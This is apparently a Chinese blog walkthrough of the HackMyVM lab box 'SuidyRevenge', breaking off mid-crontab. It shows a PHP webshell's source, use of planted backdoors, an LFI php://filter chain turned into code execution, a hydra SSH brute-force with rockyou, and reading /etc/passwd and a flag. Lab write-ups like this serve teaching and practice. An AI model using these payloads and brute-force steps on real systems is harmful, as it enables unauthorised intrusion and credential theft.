{"id":582,"date":"2024-04-18T18:46:47","date_gmt":"2024-04-18T10:46:47","guid":{"rendered":"http:\/\/162.14.82.114\/?p=582"},"modified":"2024-04-18T18:48:42","modified_gmt":"2024-04-18T10:48:42","slug":"hmv-_-suidyrevenge","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/582\/04\/18\/2024\/","title":{"rendered":"hmv[-_-]SuidyRevenge"},"content":{"rendered":"<h1>SuidyRevenge<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846304.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846304.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240418162222333\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846305.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846305.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240418163526214\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.140 -- -A\n\nOpen 192.168.0.140:22\nOpen 192.168.0.140:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 99:04:21:6d:81:68:2e:d7:fe:5e:b2:2c:1c:a2:f5:3d (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAG\/AX+0fiqIOG\/5Jb4HuzPcAIdWkKC9AY7R9eqeSvykjKD3T3cVL5rbWGz3vfkBBDqVAp6l6Fj3CGsS6h4jKrnObsoDxtfIMAgspLQF9b9KjMEcM0aLDQKusQI5H9C5\/HMsC50qx7XZUeOoTDinNR4wFjBls2PcbY8IJoRtapRYxvkRHc4l+eSpZk8+NJ2Z0xGYljlCwketld9+9BZuKEBThRvms+5ZQ8AQntoG7mD2JgeIIHr5vxU62ECM5V1EWhAnW8KEI3otZKAOpU48p3r+pWpAeGJJapWAx8f+IPzDWpR7BwosImvRvUgXgqqvPwkqCL9t8HJrieWcIrm1a1\n|   256 b2:4e:c2:91:2a:ba:eb:9c:b7:26:69:08:a2:de:f2:f1 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGWoTM7aAsBYvrYZYL4vz9sEaD+Pf0pYs61DwxR0zyK8de0rg+OoAnDz217AhoO78rRAqAdrE6382xpHKcmrm8I=\n|   256 66:4e:78:52:b1:2d:b6:9a:8b:56:2b:ca:e5:48:55:2d (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII4uRBZ1dmmy2uld4YwTO9LQeMWjp7nsQLNZXsg+nBfl\n80\/tcp open  http    syn-ack nginx 1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Site doesn&#039;t have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/SuidyRevenge]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.140 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.140\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,png,php,zip,bak,git,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 581664 \/ 1764488 (32.97%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 586627 \/ 1764488 (33.25%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\">Im proud to announce that &quot;theuser&quot; is not anymore in our servers. Our admin &quot;mudra&quot; is the best admin of the world. -suidy\n&lt;!--\n\n&quot;mudra&quot; is not the best admin, IM IN!!!!\nHe only changed my password to a different but I had time\nto put 2 backdoors (.php) from my KALI into \/supersecure to keep the access!\n\n-theuser\n\n--&gt;<\/code><\/pre>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<p>\u627e\u4e00\u4e0bkali\u81ea\u5e26\u7684webshell\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/SuidyRevenge]\n\u2514\u2500$ ls \/usr\/share\/webshells\/php\nfindsocket  php-backdoor.php  php-reverse-shell.php  qsd-php-backdoor.php  simple-backdoor.php<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u9614\u4ee5\u5229\u7528\uff0c\u6700\u540e\u4e00\u4e2a\u9614\u4ee5\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.140\/supersecure\/simple-backdoor.php?cmd=whoami<\/code><\/pre>\n<pre><code class=\"language-apl\">cmd parameter is my friend.\nwww-data<\/code><\/pre>\n<p>\u5c1d\u8bd5\u53cd\u5f39shell\uff0c\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u67e5\u770b\u4e00\u4e0b:<\/p>\n<pre><code class=\"language-php\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/SuidyRevenge]\n\u2514\u2500$ cat \/usr\/share\/webshells\/php\/simple-backdoor.php       \n&lt;!-- Simple PHP backdoor by DK (http:\/\/michaeldaw.org) --&gt;\n\n&lt;?php\n\nif(isset($_REQUEST[&#039;cmd&#039;])){\n        echo &quot;&lt;pre&gt;&quot;;\n        $cmd = ($_REQUEST[&#039;cmd&#039;]);\n        system($cmd);\n        echo &quot;&lt;\/pre&gt;&quot;;\n        die;\n}\n\n?&gt;\n\nUsage: http:\/\/target.com\/simple-backdoor.php?cmd=cat+\/etc\/passwd\n\n&lt;!--    http:\/\/michaeldaw.org   2006    --&gt;<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u5176\u4ed6\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.140\/supersecure\/simple-backdoor.php?cmd=pwd<\/code><\/pre>\n<pre><code class=\"language-text\">\/var\/www\/html\/supersecure<\/code><\/pre>\n<p>\u7136\u540e\u770b\u4e00\u4e0b\u5f53\u524d\u76ee\u5f55\u5b58\u5728\u54ea\u4e9b\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.140\/supersecure\/simple-backdoor.php?cmd=ls<\/code><\/pre>\n<pre><code class=\"language-text\">mysuperbackdoor.php\nsimple-backdoor.php<\/code><\/pre>\n<p><code>simple-backdoor.php<\/code>\u53d1\u73b0\u597d\u50cf\u53ea\u53ef\u4ee5\u4f7f\u7528\u5b57\u6bcd\u548c\u7a7a\u683c\uff0c\u5176\u4ed6\u7684\u4e0d\u7ba1\u52a0\u5565\u90fd\u4e0d\u884c\uff0c\u5c1d\u8bd5\u5229\u7528\u7b2c\u4e00\u4e2a\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.140\/supersecure\/mysuperbackdoor.php?file=php:\/\/filter\/read=convert.base64-encode\/resource=mysuperbackdoor.php<\/code><\/pre>\n<pre><code class=\"language-php\">ZmlsZSBwYXJhbWV0ZXIgaXMgbXkgZnJpZW5kLgo8P3BocAppbmNsdWRlICRfUkVRVUVTVFsnZmlsZSddOwo\/Pgo=\nfile parameter is my friend.\n&lt;?php\ninclude $_REQUEST[&#039;file&#039;];\n?&gt;<\/code><\/pre>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.140\/supersecure\/mysuperbackdoor.php?file=php:\/\/filter\/read=convert.base64-encode\/resource=simple-backdoor.php<\/code><\/pre>\n<pre><code class=\"language-php\">Y21kIHBhcmFtZXRlciBpcyBteSBmcmllbmQuCjw\/cGhwCgppZihpc3NldCgkX1JFUVVFU1RbJ2NtZCddKSl7CiAgICAgICAgZWNobyAiPHByZT4iOwogICAgICAgICRjbWQgPSAoJF9SRVFVRVNUWydjbWQnXSk7CiAgICAgICAgJHJlc3VsdCA9IHByZWdfcmVwbGFjZSgiL1teYS16QS1aMC05XSsvIiwgIiIsICRjbWQpOwogICAgICAgIHN5c3RlbSgkcmVzdWx0KTsKICAgICAgICBlY2hvICI8L3ByZT4iOwogICAgICAgIGRpZTsKfQoKPz4K\ncmd parameter is my friend.\n&lt;?php\n\nif(isset($_REQUEST[&#039;cmd&#039;])){\n        echo &quot;&lt;pre&gt;&quot;;\n        $cmd = ($_REQUEST[&#039;cmd&#039;]);\n        $result = preg_replace(&quot;\/[^a-zA-Z0-9]+\/&quot;, &quot;&quot;, $cmd);\n        system($result);\n        echo &quot;&lt;\/pre&gt;&quot;;\n        die;\n}\n\n?&gt;<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u65e0\u6587\u4ef6\u7684\u6728\u9a6c\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/php_filter_chain_generator]\n\u2514\u2500$ python3 php_filter_chain_generator.py --chain &#039;&lt;?=`$_GET[0]` ?&gt;&#039;\n[+] The following gadget chain will generate the following code : &lt;?=`$_GET[0]` ?&gt; (base64 value: PD89YCRfR0VUWzBdYCA\/Pg)\nphp:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846307.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846307.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240418172136190\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846308.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846308.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240418172146120\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/home\/suidy\/suidyyyyy\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/bin\/violent\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ file \/home\/suidy\/suidyyyyy\n\/home\/suidy\/suidyyyyy: setuid, setgid regular file, no read permission\n(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ ls -la\ntotal 16\ndrwxr-xr-x 2 root     root 4096 Oct  1  2020 .\ndrwxr-xr-x 3 root     root 4096 Oct  1  2020 ..\n-rw-r--r-- 1 www-data root   65 Oct  1  2020 mysuperbackdoor.php\n-rw-r--r-- 1 www-data root  249 Oct  1  2020 simple-backdoor.php\n(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ cd ..;ls -la\ntotal 20\ndrwxr-xr-x 3 root     root     4096 Oct  1  2020 .\ndrwxr-xr-x 3 root     root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 root     root      322 Oct  1  2020 index.html\n-rw-r--r-- 1 www-data www-data   79 Oct  1  2020 murdanote.txt\ndrwxr-xr-x 2 root     root     4096 Oct  1  2020 supersecure\n(remote) www-data@suidyrevenge:\/var\/www\/html$ cat murdanote.txt \nI always lost my password so Im using \none password from rockyou.txt !\n\n-murda\n(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ cd \/home\/suidy\/\n(remote) www-data@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nbash: .\/suidyyyyy: Permission denied\n(remote) www-data@suidyrevenge:\/home\/suidy$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \n(remote) www-data@suidyrevenge:\/home\/suidy$ ls -la\ntotal 52\ndrwxrwxr-x 3 suidy suidy    4096 Oct  2  2020 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwsrws--- 1 root  theuser 16712 Oct  2  2020 suidyyyyy\n(remote) www-data@suidyrevenge:\/home\/suidy$ <\/code><\/pre>\n<h3>\u7206\u7834\u4e00\u4e0b\u8fa3<\/h3>\n<pre><code class=\"language-bash\">hydra -l murda -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/192.168.0.140 -t 64<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846309.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846309.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240418172949704\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5c1d\u8bd5\u5207\u6362\u7528\u6237<\/h3>\n<pre><code class=\"language-bash\">murda@suidyrevenge:\/var\/www\/html$ cd \/home\/murda\/\nmurda@suidyrevenge:~$ ls -la\ntotal 36\ndrwxrwxr-- 3 murda murda 4096 Oct  1  2020 .\ndrwxr-xr-x 8 root  root  4096 Oct  1  2020 ..\n-rw------- 1 murda murda   25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 murda murda  220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 murda murda 3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 murda murda 4096 Oct  1  2020 .local\n-rwxrwx--- 1 murda murda  807 Oct  1  2020 .profile\n-rwxrwx--- 1 murda murda  178 Oct  1  2020 secret.txt\n-rwxrwx--- 1 murda murda   58 Oct  1  2020 .Xauthority\nmurda@suidyrevenge:~$ cat secret.txt \nI know that theuser is here!\nI just got the id_rsa from &quot;violent&quot;.\nI will put the key in a secure place for theuser!\nI hope he find it.\nRemember that rockyou.txt is your friend!\nmurda@suidyrevenge:~$ cat .bash_history \nrm ~\/.bash_history \nexit\nmurda@suidyrevenge:~$ cd ..\nmurda@suidyrevenge:\/home$ ls -la\ntotal 32\ndrwxr-xr-x  8 root    root    4096 Oct  1  2020 .\ndrwxr-xr-x 18 root    root    4096 Oct  1  2020 ..\ndrwxrwxr--  3 murda   murda   4096 Oct  1  2020 murda\ndrwxrwx---  2 ruin    ruin    4096 Oct  1  2020 ruin\ndrwxrwxr-x  3 suidy   suidy   4096 Oct  2  2020 suidy\ndrwxrwx---  3 theuser theuser 4096 Oct  2  2020 theuser\ndrwxrwx---  3 violent violent 4096 Oct  1  2020 violent\ndrwxrwx---  2 yo      yo      4096 Oct  1  2020 yo\nmurda@suidyrevenge:\/home$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nmurda:x:1000:1000:murda,,,:\/home\/murda:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nviolent:x:1001:1001:,,,:\/home\/violent:\/bin\/bash\nyo:x:1002:1002:,,,:\/home\/yo:\/bin\/bash\nruin:x:1003:1003:,,,:\/home\/ruin:\/bin\/bash\ntheuser:x:1004:1004:,,,:\/home\/theuser:\/bin\/bash\nsuidy:x:1005:1005:,,,:\/home\/suidy:\/bin\/bash<\/code><\/pre>\n<h3>\u83b7\u53d6theuser<\/h3>\n<p>\u6211\u6ef4\u5988\uff0c\u597d\u591a\u7684\u7528\u6237\u3002\u3002\u3002\u3002<\/p>\n<p>\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b<code>theuser<\/code>\uff0c\u4e00\u76f4\u672a\u679c\uff0c\u5c1d\u8bd5web\u4e0a\u7684\u90a3\u4e9b\u4e2a\u5355\u8bcd\uff0c\u53d1\u73b0\u5bc6\u7801\u4e3a<code>different<\/code>\uff1a<\/p>\n<pre><code class=\"language-bash\">murda@suidyrevenge:\/home$ su theuser\nPassword: \ntheuser@suidyrevenge:\/home$ cd theuser\/\ntheuser@suidyrevenge:~$ ls -la\ntotal 32\ndrwxrwx--- 3 theuser theuser 4096 Oct  2  2020 .\ndrwxr-xr-x 8 root    root    4096 Oct  1  2020 ..\n-rw------- 1 theuser theuser   33 Oct  2  2020 .bash_history\n-rwxrwx--- 1 theuser theuser  220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 theuser theuser 3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 theuser theuser 4096 Oct  1  2020 .local\n-rwxrwx--- 1 theuser theuser  807 Oct  1  2020 .profile\n-rw-r----- 1 theuser theuser 1961 Oct  2  2020 user.txt\ntheuser@suidyrevenge:~$ cat user.txt \n\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,                                      \n\nHMVbisoususeryay\ntheuser@suidyrevenge:~$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for theuser: \nSorry, user theuser may not run sudo on suidyrevenge.\ntheuser@suidyrevenge:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd 